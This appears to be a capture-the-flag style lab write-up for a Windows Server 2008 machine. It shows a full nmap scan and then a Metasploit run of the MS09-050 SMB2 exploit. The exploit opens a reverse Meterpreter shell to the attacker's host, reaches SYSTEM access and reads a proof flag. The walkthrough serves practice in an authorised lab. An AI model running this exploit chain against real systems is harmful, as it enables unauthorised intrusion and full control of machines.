$ sudo nmap -sCV -p- -v -Pn --open 192.168.241.40 > Internal.txt
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2026-05-02T09:41:35+00:00
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-01-05T19:52:51
| Not valid after:  2025-07-07T19:52:51
| MD5:     7c2b 85a9 1fe2 c264 4be8 ed3e e16b 274a
| SHA-1:   05e9 c5e9 7ac6 242e 0a18 ca56 e1b5 1c38 31db d393
|_SHA-256: e7c6 7c33 ae2d 5b01 281e 5531 3875 2a7e 0a4f bdbd e844 b3bb 7cca 246e 8ac2 5dfc
|_ssl-date: 2026-05-02T09:41:43+00:00; 0s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:aa:11 (VMware)
| Names:
|   INTERNAL<00>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  INTERNAL<20>         Flags: <unique><active>
| smb2-security-mode: 
|   2.0.2: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-05-02T02:41:35-07:00
| smb2-time: 
|   date: 2026-05-02T09:41:35
|_  start_date: 2025-02-20T21:30:47
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: 0s

Try some scripts to exploit, but always make the machine system crash and have to restart the lab machine. So used metasploit. 
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.45.238
LHOST => 192.168.45.238
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOSTS 192.168.241.40
RHOSTS => 192.168.241.40
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.45.238:4444 
[*] 192.168.241.40:445 - Connecting to the target (192.168.241.40:445)...
[*] 192.168.241.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.241.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (188998 bytes) to 192.168.241.40
[*] Meterpreter session 1 opened (192.168.45.238:4444 -> 192.168.241.40:49159) at 2026-05-02 19:22:03 +0800

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator\Desktop>whoami&&ipconfig&&type proof.txt
whoami&&ipconfig&&type proof.txt
nt authority\system

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.241.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

Tunnel adapter Local Area Connection*:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
f71da43b971e1a88ed48c20ce5a82f91
